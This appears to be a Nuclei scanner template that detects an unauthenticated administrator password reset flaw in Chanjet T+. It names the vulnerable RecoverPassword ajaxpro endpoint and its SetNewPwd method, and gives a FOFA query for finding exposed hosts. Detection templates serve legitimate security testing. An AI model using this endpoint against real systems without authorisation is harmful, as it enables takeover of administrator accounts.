id: chanjet-tplus-unauth-passreset

info:
  name: Chanjet Tplus - Unauthorized Password Reset
  author: 0xr2r
  severity: high
  description: |
    There is an unauthorized administrator password modification vulnerability in UF Chanjet T+ RecoverPassword.aspx. An attacker can use this vulnerability to modify the administrator account password to log in to the backend.
  reference:
    - https://cn-sec.com/archives/1377207.html
    - https://www.chanjet.com
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="畅捷通-TPlus"
  tags: tplus,unauth,chanjet

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}"
      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"

    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'tplus”应用程序中的服务器错误')"
          - "!contains(body_2, '>请重新登录')"
        condition: and
# digest: 4b0a00483046022100afab4f517c75318827ca19af3b868b58c454f4f7301380cc148c678ef4c13aed022100ed3f1b2424d5b97dc049f3db2d5bd50e7b8d185a6007bb7175ba16e544f67af9:922c64590222798bb761d5b6d8e72950